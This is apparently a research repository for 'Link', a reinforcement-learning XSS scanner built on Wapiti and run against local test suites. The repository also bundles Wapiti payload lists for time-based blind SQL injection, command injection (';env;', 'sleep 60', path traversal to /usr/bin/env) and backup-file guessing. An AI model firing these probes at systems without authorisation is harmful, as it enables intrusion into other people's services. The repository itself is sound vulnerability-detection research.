├── README.md
├── attack_A2C.py
├── gym_reflected_xss
    ├── 1.html
    ├── __init__.py
    ├── __pycache__
    │   ├── __init__.cpython-36.pyc
    │   └── __init__.cpython-37.pyc
    ├── attack_module
    │   ├── __init__.py
    │   ├── __pycache__
    │   │   ├── __init__.cpython-37.pyc
    │   │   └── attack.cpython-36.pyc
    │   ├── attack
    │   │   ├── __init__.py
    │   │   ├── __pycache__
    │   │   │   ├── __init__.cpython-37.pyc
    │   │   │   ├── attack.cpython-37.pyc
    │   │   │   ├── jsparser.cpython-37.pyc
    │   │   │   └── mod_xss.cpython-37.pyc
    │   │   ├── attack.py
    │   │   ├── jsparser.py
    │   │   └── mod_xss.py
    │   ├── config
    │   │   ├── attacks
    │   │   │   ├── backupPayloads.txt
    │   │   │   ├── blindSQLPayloads.txt
    │   │   │   ├── busterPayloads.txt
    │   │   │   ├── execPayloads.txt
    │   │   │   ├── fileHandlingPayloads.ini
    │   │   │   ├── xssPayloads.ini
    │   │   │   └── xxePayloads.ini
    │   │   ├── language
    │   │   │   ├── de
    │   │   │   │   └── LC_MESSAGES
    │   │   │   │   │   └── wapiti.mo
    │   │   │   ├── en
    │   │   │   │   └── LC_MESSAGES
    │   │   │   │   │   └── wapiti.mo
    │   │   │   ├── es
    │   │   │   │   └── LC_MESSAGES
    │   │   │   │   │   └── wapiti.mo
    │   │   │   ├── fr
    │   │   │   │   └── LC_MESSAGES
    │   │   │   │   │   └── wapiti.mo
    │   │   │   ├── ms
    │   │   │   │   └── LC_MESSAGES
    │   │   │   │   │   └── wapiti.mo
    │   │   │   ├── pt
    │   │   │   │   └── LC_MESSAGES
    │   │   │   │   │   └── wapiti.mo
    │   │   │   └── zh
    │   │   │   │   └── LC_MESSAGES
    │   │   │   │       └── wapiti.mo
    │   │   ├── reports
    │   │   │   └── generators.xml
    │   │   └── vulnerabilities
    │   │   │   ├── anomalies.xml
    │   │   │   └── vulnerabilities.xml
    │   ├── language
    │   │   ├── __init__.py
    │   │   ├── __pycache__
    │   │   │   ├── __init__.cpython-37.pyc
    │   │   │   ├── language.cpython-37.pyc
    │   │   │   ├── logger.cpython-37.pyc
    │   │   │   └── vulnerability.cpython-37.pyc
    │   │   ├── language.py
    │   │   ├── logger.py
    │   │   └── vulnerability.py
    │   ├── language_sources
    │   │   ├── de.po
    │   │   ├── en.po
    │   │   ├── es.po
    │   │   ├── fr.po
    │   │   ├── ms.po
    │   │   ├── pt.po
    │   │   ├── sav_en.po
    │   │   └── zh.po
    │   ├── main
    │   │   ├── __init__.py
    │   │   ├── __pycache__
    │   │   │   ├── __init__.cpython-37.pyc
    │   │   │   └── attack_module.cpython-37.pyc
    │   │   └── attack_module.py
    │   └── net
    │   │   ├── __init__.py
    │   │   ├── __pycache__
    │   │       ├── __init__.cpython-37.pyc
    │   │       ├── crawler.cpython-37.pyc
    │   │       ├── jsoncookie.cpython-37.pyc
    │   │       ├── lamejs.cpython-37.pyc
    │   │       ├── sqlite_persister.cpython-37.pyc
    │   │       ├── web.cpython-37.pyc
    │   │       └── xss_utils.cpython-37.pyc
    │   │   ├── crawler.py
    │   │   ├── jsoncookie.py
    │   │   ├── jsparser
    │   │       ├── __init__.py
    │   │       ├── __pycache__
    │   │       │   ├── __init__.cpython-37.pyc
    │   │       │   └── jsparser3.cpython-37.pyc
    │   │       └── jsparser3.py
    │   │   ├── lamejs.py
    │   │   ├── login.py
    │   │   ├── login_urls.txt
    │   │   ├── sqlite_persister.py
    │   │   ├── web.py
    │   │   └── xss_utils.py
    ├── envs
    │   ├── __init__.py
    │   ├── __pycache__
    │   │   ├── __init__.cpython-36.pyc
    │   │   ├── __init__.cpython-37.pyc
    │   │   ├── action.cpython-37.pyc
    │   │   ├── observation.cpython-37.pyc
    │   │   ├── reflected_xss_env.cpython-36.pyc
    │   │   └── reflected_xss_env.cpython-37.pyc
    │   ├── action.py
    │   ├── observation.py
    │   └── reflected_xss_env.py
    └── input_module
    │   ├── __init__.py
    │   ├── __pycache__
    │       ├── __init__.cpython-37.pyc
    │       ├── input_generator.cpython-36.pyc
    │       ├── input_generator.cpython-37.pyc
    │       └── pyjsfuck.cpython-37.pyc
    │   ├── input_generator.py
    │   ├── jsfuck.js
    │   └── pyjsfuck.py
├── sample_agent.pkl
└── train_A2C.py


/README.md:
--------------------------------------------------------------------------------
 1 | # Link
 2 | Link is a general RL framework to find reflected XSS vulnerabilities in a black-box and fully automatic manner. It implemented on top of [Wapiti](https://github.com/wapiti-scanner/wapiti) a popular open source web scanner. And reinforcement learning components are implemeted based on [OpenAI gym](https://gym.openai.com/) and [Stable baselines](https://github.com/hill-a/stable-baselines).
 3 | The details of Link is in our [paper](https://dl.acm.org/doi/10.1145/3485447.3512234), "Link: Black-Box Detection of Cross-Site Scripting Vulnerabilities
 4 | Using Reinforcement Learning" which appeared in The Web Conference 2022. 
 5 | 
 6 | ## Requirements
 7 | 
 8 | - Recommend to use Anaconda3 
 9 | - Tensorflow==1.14
10 | - gym
11 | - stable-baselines
12 |   
13 | 
14 | ## Instruction 
15 | ### Training Session
16 | 
17 |     $ python3 train.py -u <training application url> -t <timesteps>
18 |     $ python3 train.py -u 'http://localhost:8080' -t 200000
19 | 
20 | 
21 | 
22 | ### XSS detection phase using trained agent
23 | 
24 |     $ python3 attack_A2C.py -u <target url> -n <model name>
25 |     $ python3 attack_A2C.py -u 'http://localhost:8080' -n sample_agent.pkl
26 | 
27 | 
28 | ### Training visulization (Tensorboard)
29 | 
30 |     $ tensorboard --logdir [log directory name]
31 |     $ tensorboard --logdir ./tensorboard_log/
32 | 
33 | 
34 | ## Test Suite Installation
35 | ### [Google Firing Range](https://github.com/google/firing-range)
36 | 1. `sudo apt-get install git ant`
37 | 2. Download Google AppEngine SDK file in test suite dependency folder and unzip it
38 | 3. `git clone https://github.com/google/firing-range.git`
39 | 4. `cd firing-range`
40 | 5. Modify `build.xml`, `appengine.sdk` should be your own path of extracted folder
41 | 6. Add below code on line 70 in `build.xml`
42 |    
43 |    `<get src="https://repo1.maven.org/maven2/servletapi/servlet-api/2.4/servlet-api-2.4.jar" dest="${war.dir}/WEB-INF/lib"/>`
44 |     
45 | 7. `ant runserver`
46 | 8. Test Suite will run on `localhost:8080`
47 | 9. You should kill process before restart 
48 | ~~~
49 |     $ sudo netstat -lpn |grep :8080
50 |     $ kill process_id
51 | ~~~
52 | ### [OWASP Benchmark](https://owasp.org/www-project-benchmark/)
53 | 
54 |     $ git clone https://github.com/OWASP/benchmark 
55 |     $ cd benchmark
56 |     $ mvn compile   (This compiles it)
57 |     $ sudo runBenchmark.sh/.bat - This compiles and runs it.
58 | 
59 | - Access on `https://localhost:8443/benchmark/`
60 | 
61 | 
62 | ### [WAVSEP](https://code.google.com/archive/p/wavsep/)
63 | 
64 |     $ docker pull owaspvwad/wavsep
65 |     $ docker run -p 127.0.0.1:8090:8080 owaspvwad/wavsep
66 | 
67 | - Access on `http://localhost:8090/wavsep/active/index-xss.jsp`
68 | 
69 | 
70 | 
71 | ## Authors 
72 | * Soyoung Lee
73 | * [Seongil Wi](https://seongil-wi.github.io/)
74 | * [Sooel Son](https://sites.google.com/site/ssonkaist/home)
75 | 
76 | ## Citing Link
77 | 
78 | To cite our paper:
79 | ```
80 | @inproceedings{lee:www:2022,
81 |     author = {Lee, Soyoung and Wi, Seongil and Son, Sooel},
82 |     title = {Link: Black-Box Detection of Cross-Site Scripting Vulnerabilities Using Reinforcement Learning},
83 |     year = 2022,
84 |     booktitle = {Proceedings of the {ACM} Web Conference},
85 |     pages = {743--754}
86 | }
87 | ```
88 | 


--------------------------------------------------------------------------------
/attack_A2C.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import getopt
 3 | import gym
 4 | import gym_reflected_xss
 5 | 
 6 | # from baselines import deepq
 7 | # from baselines.logger import Logger, TensorBoardOutputFormat, HumanOutputFormat
 8 | from stable_baselines.common.vec_env import DummyVecEnv
 9 | from stable_baselines.deepq.policies import MlpPolicy
10 | from stable_baselines import DQN, A2C
11 | 
12 | # remove tensorflow warning messages
13 | import warnings
14 | warnings.simplefilter(action='ignore', category=FutureWarning)
15 | import tensorflow as tf
16 | tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
17 | 
18 | def callback(lcl, glb):
19 |     # stop training if reward exceeds 199 
20 |     is_solved = lcl['t'] > 100 and sum(lcl['epsiode_rewards'][-101:-1] / 100 >= 100)
21 |     return is_solved 
22 | 
23 | def main(argv):
24 | 
25 |     start_url = ""
26 |     model_name = ""
27 |     option = 0
28 |     
29 |     try:
30 |         opts, etc_args= getopt.getopt(argv[1:], "u:n")
31 |     except getopt.GetoptError:
32 |         print("Use option -o")
33 |         sys.exit(2)
34 |     
35 |     for opt,arg in opts:
36 |         if opt in ("-u"):
37 |             option = arg
38 |         if opt in ("-n"):
39 |             model_name = arg
40 | 
41 | 
42 |             
43 |     
44 |     start_url = option
45 |     
46 |     # create the environment 
47 |     env = gym.make("reflected-xss-v0", start_url=start_url, mode=1, log_file_name="model_log.txt", block_obs=-1)
48 | 
49 |     # create learning agent 
50 |     print("[*] Loading A2Cmodel ...")
51 | 
52 |     model = A2C.load("models/" + model_name)
53 |     print("[*] Start Agent working ...")
54 |     obs = env.reset() 
55 |     numberOfTarget = 0
56 |     
57 | 
58 |     while True:
59 | 
60 |         action , _states = model.predict(obs)
61 | 
62 |         obs, rewards, done, info = env.step(action)
63 |         env.render() 
64 | 
65 |         if done:
66 |             numberOfTarget += 1
67 |             print("# of status: " + str(numberOfTarget))
68 |             env.reset()
69 |         
70 |    
71 | 
72 | if __name__ == '__main__':
73 |     main(sys.argv)


--------------------------------------------------------------------------------
/gym_reflected_xss/1.html:
--------------------------------------------------------------------------------
1 | <!---->-->
2 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/__init__.py:
--------------------------------------------------------------------------------
1 | from gym.envs.registration import register
2 | 
3 | register(id='reflected-xss-v0', entry_point='gym_reflected_xss.envs:ReflectedXSSEnv', )
4 | 
5 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/__pycache__/__init__.cpython-36.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/__init__.py


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/__pycache__/attack.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/__pycache__/attack.cpython-36.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/attack/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/attack/__init__.py


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/attack/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/attack/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/attack/__pycache__/attack.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/attack/__pycache__/attack.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/attack/__pycache__/jsparser.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/attack/__pycache__/jsparser.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/attack/__pycache__/mod_xss.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/attack/__pycache__/mod_xss.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/attack/jsparser.py:
--------------------------------------------------------------------------------
 1 | from pyjsparser import parse
 2 | 
 3 | result = parse('var _p = {"web": "http:\/\/localhost\/cms\/chamilo\/","web_url": "http:\/\/localhost\/cms\/chamilo\/web\/","web_relative": "\/","web_course": "http:\/\/localhost\/cms\/chamilo\/courses\/","web_main": "http:\/\/localhost\/cms\/chamilo\/main\/","web_css": "http:\/\/localhost\/cms\/chamilo\/web\/css\/","web_css_theme": "http:\/\/localhost\/cms\/chamilo\/web\/css\/themes\/chamilo\/","web_ajax": "http:\/\/localhost\/cms\/chamilo\/main\/inc\/ajax\/","web_img": "http:\/\/localhost\/cms\/chamilo\/main\/img\/","web_plugin": "http:\/\/localhost\/cms\/chamilo\/plugin\/","web_lib": "http:\/\/localhost\/cms\/chamilo\/main\/inc\/lib\/","web_upload": "http:\/\/localhost\/cms\/chamilo\/app\/upload\/","web_self": "\/cms\/chamilo\/main\/calendar\/agenda_list.php\/alert(0727);\/","self_basename": "alert(0727);","web_query_vars": "","web_self_query_vars": "\/cms\/chamilo\/main\/calendar\/agenda_list.php\/alert(0727);\/","web_cid_query": "","web_rel_code": "\/main\/"}')
 4 | 
 5 | 
 6 | # {'type': 'Program', 'body': [{'type': 'ExpressionStatement', 'expression': {'type': 'CallExpression', 'callee': {'type': 'Identifier', 'name': 'alert'}, 'arguments': [{'type': 'Literal', 'value': 1.0, 'raw': '1'}]}}]}
 7 | 
 8 | def rec_dict_search(dic):
 9 |     found = False
10 |     
11 |     if type(dic) == dict:
12 |         try:
13 |             if dic['type'] == 'CallExpression':
14 |                 if dic['callee']['name'] in ["alert","confirm","prompt"]:
15 |                     if dic['arguments']:
16 |                         for elem in dic['arguments']:
17 |                             if elem['raw'] == '0727':
18 |                                 found = True
19 |                                 return True
20 |             if not found:
21 |                 keys=dic.keys()
22 |                 for key in keys:
23 |                     if rec_dict_search(dic[key]):
24 |                         found = True
25 |                     if found: break
26 |         except: 
27 |             keys=dic.keys()
28 |             for key in keys:
29 |                 if rec_dict_search(dic[key]):
30 |                     found = True
31 |                 if found: break
32 |     
33 |     elif type(dic) == str:
34 |         return False
35 | 
36 |     elif type(dic) == list:
37 |         for elem in dic:
38 |             keys=elem.keys()
39 |             for key in keys:
40 |                 if rec_dict_search(elem[key]):
41 |                     found = True
42 |                 if found: break
43 |             if found: break
44 |     
45 |     return found
46 | 
47 | try:
48 |     result2 = parse('var a = "!@#4"; /**/ prompt(0727)')
49 |     if rec_dict_search(result2):
50 |         print("detected")
51 | except:
52 |     print("Error")
53 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/attacks/backupPayloads.txt:
--------------------------------------------------------------------------------
 1 | [FILE_NAME]~
 2 | [FILE_NAME].backup
 3 | [FILE_NAME].bck
 4 | [FILE_NAME].old
 5 | [FILE_NAME].save
 6 | [FILE_NAME].bak
 7 | .[FILE_NAME].swp
 8 | [FILE_NAME].zip
 9 | [FILE_NAME].rar
10 | [FILE_NAME].tar.gz
11 | [FILE_NAME].tgz
12 | [FILE_NAME].tar.bz2
13 | [FILE_NAME].tbz2
14 | [FILE_NAME].7zip
15 | [FILE_NOEXT].backup
16 | [FILE_NOEXT].bck
17 | [FILE_NOEXT].old
18 | [FILE_NOEXT].save
19 | [FILE_NOEXT].bak
20 | [FILE_NOEXT].zip
21 | [FILE_NOEXT].rar
22 | [FILE_NOEXT].tar.gz
23 | [FILE_NOEXT].tgz
24 | [FILE_NOEXT].tar.bz2
25 | [FILE_NOEXT].tbz2
26 | [FILE_NOEXT].7zip
27 | backup.tgz
28 | backup.zip
29 | backup.7zip
30 | backup.tar.gz
31 | backup.tar.bz2
32 | backup.sql


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/attacks/blindSQLPayloads.txt:
--------------------------------------------------------------------------------
  1 | sleep([TIME])#1
  2 | sleep([TIME])#[LF]1
  3 | [VALUE],sleep([TIME])#1
  4 | [VALUE]`,sleep([TIME])#1
  5 | 1 or sleep([TIME])#1
  6 | 1 or sleep([TIME])#[LF]1
  7 | " or sleep([TIME])#1
  8 | " or sleep([TIME])#[LF]1
  9 | ' or sleep([TIME])#1
 10 | ' or sleep([TIME])#[LF]1
 11 | " or sleep([TIME])="
 12 | ' or sleep([TIME])='
 13 | 1) or sleep([TIME])#1
 14 | 1) or sleep([TIME])#[LF]1
 15 | ") or sleep([TIME])="
 16 | ') or sleep([TIME])='
 17 | 1)) or sleep([TIME])#1
 18 | 1)) or sleep([TIME])#[LF]1
 19 | ")) or sleep([TIME])="
 20 | ')) or sleep([TIME])='
 21 | 1 and sleep([TIME])#1
 22 | 1 and sleep([TIME])#[LF]1
 23 | " and sleep([TIME])#1
 24 | " and sleep([TIME])#[LF]1
 25 | ' and sleep([TIME])#1
 26 | ' and sleep([TIME])#[LF]1
 27 | " and sleep([TIME])="
 28 | ' and sleep([TIME])='
 29 | 1) and sleep([TIME])#1
 30 | 1) and sleep([TIME])#[LF]1
 31 | ") and sleep([TIME])="
 32 | ') and sleep([TIME])='
 33 | 1)) and sleep([TIME])#1
 34 | 1)) and sleep([TIME])#[LF]1
 35 | ")) and sleep([TIME])="
 36 | ')) and sleep([TIME])='
 37 | ;waitfor delay '0:0:[TIME]'--1
 38 | [VALUE];waitfor delay '0:0:[TIME]'--1
 39 | [VALUE] waitfor delay '0:0:[TIME]'--1
 40 | ;waitfor delay '0:0:[TIME]'--[LF]1
 41 | );waitfor delay '0:0:[TIME]'--1
 42 | [VALUE]);waitfor delay '0:0:[TIME]'--1
 43 | );waitfor delay '0:0:[TIME]'--[LF]1
 44 | ';waitfor delay '0:0:[TIME]'--1
 45 | ';waitfor delay '0:0:[TIME]'--[LF]1
 46 | ";waitfor delay '0:0:[TIME]'--1
 47 | ";waitfor delay '0:0:[TIME]'--[LF]1
 48 | ');waitfor delay '0:0:[TIME]'--1
 49 | ');waitfor delay '0:0:[TIME]'--[LF]1
 50 | ");waitfor delay '0:0:[TIME]'--1
 51 | ");waitfor delay '0:0:[TIME]'--[LF]1
 52 | ));waitfor delay '0:0:[TIME]'--1
 53 | [VALUE]));waitfor delay '0:0:[TIME]'--1
 54 | ));waitfor delay '0:0:[TIME]'--[LF]1
 55 | '));waitfor delay '0:0:[TIME]'--1
 56 | '));waitfor delay '0:0:[TIME]'--[LF]1
 57 | "));waitfor delay '0:0:[TIME]'--1
 58 | "));waitfor delay '0:0:[TIME]'--[LF]1
 59 | benchmark(10000000,MD5(1))#1
 60 | 1 or benchmark(10000000,MD5(1))#1
 61 | " or benchmark(10000000,MD5(1))#1
 62 | ' or benchmark(10000000,MD5(1))#1
 63 | 1) or benchmark(10000000,MD5(1))#1
 64 | ") or benchmark(10000000,MD5(1))#1
 65 | ') or benchmark(10000000,MD5(1))#1
 66 | 1)) or benchmark(10000000,MD5(1))#1
 67 | ")) or benchmark(10000000,MD5(1))#1
 68 | ')) or benchmark(10000000,MD5(1))#1
 69 | pg_sleep([TIME])--1
 70 | pg_sleep([TIME])--[LF]1
 71 | 1 or pg_sleep([TIME])--1
 72 | 1 or pg_sleep([TIME])--[LF]1
 73 | " or pg_sleep([TIME])--1
 74 | " or pg_sleep([TIME])--[LF]1
 75 | ' or pg_sleep([TIME])--1
 76 | ' or pg_sleep([TIME])--[LF]1
 77 | 1) or pg_sleep([TIME])--1
 78 | 1) or pg_sleep([TIME])--[LF]1
 79 | ") or pg_sleep([TIME])--1
 80 | ") or pg_sleep([TIME])--[LF]1
 81 | ') or pg_sleep([TIME])--1
 82 | ') or pg_sleep([TIME])--[LF]1
 83 | 1)) or pg_sleep([TIME])--1
 84 | ")) or pg_sleep([TIME])--1
 85 | ')) or pg_sleep([TIME])--1
 86 | 1 and pg_sleep([TIME])--1
 87 | " and pg_sleep([TIME])--1
 88 | ' and pg_sleep([TIME])--1
 89 | 1) and pg_sleep([TIME])--1
 90 | ") and pg_sleep([TIME])--1
 91 | ') and pg_sleep([TIME])--1
 92 | 1)) and pg_sleep([TIME])--1
 93 | ")) and pg_sleep([TIME])--1
 94 | ')) and pg_sleep([TIME])--1
 95 | 1[TAB]or[TAB]sleep([TIME])#1
 96 | "[TAB]or[TAB]sleep([TIME])#1
 97 | '[TAB]or[TAB]sleep([TIME])#1
 98 | "[TAB]or[TAB]sleep([TIME])="
 99 | '[TAB]or[TAB]sleep([TIME])='
100 | 1)[TAB]or[TAB]sleep([TIME])#1
101 | ")[TAB]or[TAB]sleep([TIME])="
102 | ')[TAB]or[TAB]sleep([TIME])='
103 | 1))[TAB]or[TAB]sleep([TIME])#1
104 | "))[TAB]or[TAB]sleep([TIME])="
105 | '))[TAB]or[TAB]sleep([TIME])='
106 | 1[TAB]and[TAB]sleep([TIME])#1
107 | "[TAB]and[TAB]sleep([TIME])#1
108 | '[TAB]and[TAB]sleep([TIME])#1
109 | "[TAB]and[TAB]sleep([TIME])="
110 | '[TAB]and[TAB]sleep([TIME])='
111 | 1)[TAB]and[TAB]sleep([TIME])#1
112 | ")[TAB]and[TAB]sleep([TIME])="
113 | ')[TAB]and[TAB]sleep([TIME])='
114 | 1))[TAB]and[TAB]sleep([TIME])#1
115 | "))[TAB]and[TAB]sleep([TIME])="
116 | '))[TAB]and[TAB]sleep([TIME])='
117 | ;waitfor[TAB]delay[TAB]'0:0:[TIME]'--1
118 | );waitfor[TAB]delay[TAB]'0:0:[TIME]'--1
119 | ';waitfor[TAB]delay[TAB]'0:0:[TIME]'--1
120 | ";waitfor[TAB]delay[TAB]'0:0:[TIME]'--1
121 | ');waitfor[TAB]delay[TAB]'0:0:[TIME]'--1
122 | ");waitfor[TAB]delay[TAB]'0:0:[TIME]'--1
123 | ));waitfor[TAB]delay[TAB]'0:0:[TIME]'--1
124 | '));waitfor[TAB]delay[TAB]'0:0:[TIME]'--1
125 | "));waitfor[TAB]delay[TAB]'0:0:[TIME]'--1
126 | 1[TAB]or[TAB]benchmark(10000000,MD5(1))#1
127 | "[TAB]or[TAB]benchmark(10000000,MD5(1))#1
128 | '[TAB]or[TAB]benchmark(10000000,MD5(1))#1
129 | 1)[TAB]or[TAB]benchmark(10000000,MD5(1))#1
130 | ")[TAB]or[TAB]benchmark(10000000,MD5(1))#1
131 | ')[TAB]or[TAB]benchmark(10000000,MD5(1))#1
132 | 1))[TAB]or[TAB]benchmark(10000000,MD5(1))#1
133 | "))[TAB]or[TAB]benchmark(10000000,MD5(1))#1
134 | '))[TAB]or[TAB]benchmark(10000000,MD5(1))#1
135 | 1[TAB]or[TAB]pg_sleep([TIME])--1
136 | "[TAB]or[TAB]pg_sleep([TIME])--1
137 | '[TAB]or[TAB]pg_sleep([TIME])--1
138 | 1)[TAB]or[TAB]pg_sleep([TIME])--1
139 | ")[TAB]or[TAB]pg_sleep([TIME])--1
140 | ')[TAB]or[TAB]pg_sleep([TIME])--1
141 | 1))[TAB]or[TAB]pg_sleep([TIME])--1
142 | "))[TAB]or[TAB]pg_sleep([TIME])--1
143 | '))[TAB]or[TAB]pg_sleep([TIME])--1
144 | 1[TAB]and[TAB]pg_sleep([TIME])--1
145 | "[TAB]and[TAB]pg_sleep([TIME])--1
146 | '[TAB]and[TAB]pg_sleep([TIME])--1
147 | 1)[TAB]and[TAB]pg_sleep([TIME])--1
148 | ")[TAB]and[TAB]pg_sleep([TIME])--1
149 | ')[TAB]and[TAB]pg_sleep([TIME])--1
150 | 1))[TAB]and[TAB]pg_sleep([TIME])--1
151 | "))[TAB]and[TAB]pg_sleep([TIME])--1
152 | '))[TAB]and[TAB]pg_sleep([TIME])--1
153 | 1/**/or/**/sleep([TIME])#1
154 | "/**/or/**/sleep([TIME])#1
155 | '/**/or/**/sleep([TIME])#1
156 | "/**/or/**/sleep([TIME])="
157 | '/**/or/**/sleep([TIME])='
158 | 1)/**/or/**/sleep([TIME])#1
159 | ")/**/or/**/sleep([TIME])="
160 | ')/**/or/**/sleep([TIME])='
161 | 1))/**/or/**/sleep([TIME])#1
162 | "))/**/or/**/sleep([TIME])="
163 | '))/**/or/**/sleep([TIME])='
164 | 1/**/and/**/sleep([TIME])#1
165 | "/**/and/**/sleep([TIME])#1
166 | '/**/and/**/sleep([TIME])#1
167 | "/**/and/**/sleep([TIME])="
168 | '/**/and/**/sleep([TIME])='
169 | 1)/**/and/**/sleep([TIME])#1
170 | ")/**/and/**/sleep([TIME])="
171 | ')/**/and/**/sleep([TIME])='
172 | 1))/**/and/**/sleep([TIME])#1
173 | "))/**/and/**/sleep([TIME])="
174 | '))/**/and/**/sleep([TIME])='
175 | ;waitfor/**/delay/**/'0:0:[TIME]'--1
176 | );waitfor/**/delay/**/'0:0:[TIME]'--1
177 | ';waitfor/**/delay/**/'0:0:[TIME]'--1
178 | ";waitfor/**/delay/**/'0:0:[TIME]'--1
179 | ');waitfor/**/delay/**/'0:0:[TIME]'--1
180 | ");waitfor/**/delay/**/'0:0:[TIME]'--1
181 | ));waitfor/**/delay/**/'0:0:[TIME]'--1
182 | '));waitfor/**/delay/**/'0:0:[TIME]'--1
183 | "));waitfor/**/delay/**/'0:0:[TIME]'--1
184 | 1/**/or/**/benchmark(10000000,MD5(1))#1
185 | "/**/or/**/benchmark(10000000,MD5(1))#1
186 | '/**/or/**/benchmark(10000000,MD5(1))#1
187 | 1)/**/or/**/benchmark(10000000,MD5(1))#1
188 | ")/**/or/**/benchmark(10000000,MD5(1))#1
189 | ')/**/or/**/benchmark(10000000,MD5(1))#1
190 | 1))/**/or/**/benchmark(10000000,MD5(1))#1
191 | "))/**/or/**/benchmark(10000000,MD5(1))#1
192 | '))/**/or/**/benchmark(10000000,MD5(1))#1
193 | 1/**/or/**/pg_sleep([TIME])--1
194 | "/**/or/**/pg_sleep([TIME])--1
195 | '/**/or/**/pg_sleep([TIME])--1
196 | 1)/**/or/**/pg_sleep([TIME])--1
197 | ")/**/or/**/pg_sleep([TIME])--1
198 | ')/**/or/**/pg_sleep([TIME])--1
199 | 1))/**/or/**/pg_sleep([TIME])--1
200 | "))/**/or/**/pg_sleep([TIME])--1
201 | '))/**/or/**/pg_sleep([TIME])--1
202 | 1/**/and/**/pg_sleep([TIME])--1
203 | "/**/and/**/pg_sleep([TIME])--1
204 | '/**/and/**/pg_sleep([TIME])--1
205 | 1)/**/and/**/pg_sleep([TIME])--1
206 | ")/**/and/**/pg_sleep([TIME])--1
207 | ')/**/and/**/pg_sleep([TIME])--1
208 | 1))/**/and/**/pg_sleep([TIME])--1
209 | "))/**/and/**/pg_sleep([TIME])--1
210 | '))/**/and/**/pg_sleep([TIME])--1
211 | ' and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
212 | " and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
213 | ') and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
214 | ") and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
215 | ')) and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
216 | ")) and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
217 | ';d=new Date();do{cd=new Date();}while(cd-d<10000);//
218 | ";d=new Date();do{cd=new Date();}while(cd-d<10000);//
219 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/attacks/execPayloads.txt:
--------------------------------------------------------------------------------
 1 | ;env;
 2 | a;env;
 3 | a);env;
 4 | ../../../../../../../../../../../../../../../usr/bin/env|
 5 | [VALUE];env;
 6 | [VALUE][LF]env;
 7 | &set&
 8 | /e\0
 9 | a;exit(md5('w4p1t1_md5'));//
10 | a;exit(md5('w4p1t1_md5'));#
11 | ";exit(md5('w4p1t1_md5'));//
12 | ";exit(md5('w4p1t1_md5'));#
13 | ';exit(md5('w4p1t1_md5'));//
14 | ';exit(md5('w4p1t1_md5'));#
15 | ".exit(md5('w4p1t1_md5'));//
16 | ".exit(md5('w4p1t1_md5'));#
17 | '.exit(md5('w4p1t1_md5'));//
18 | '.exit(md5('w4p1t1_md5'));#
19 | ;exit(md5('w4p1t1_md5'));//
20 | ;exit(md5('w4p1t1_md5'));#
21 | data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==
22 | a`)`
23 | a`sleep 60`[TIMEOUT]
24 | a;sleep 60;[TIMEOUT]
25 | a|sleep 60;[TIMEOUT]
26 | &ping -n 25 127.0.0.1&[TIMEOUT]


--------------------------------------------------------------------------------
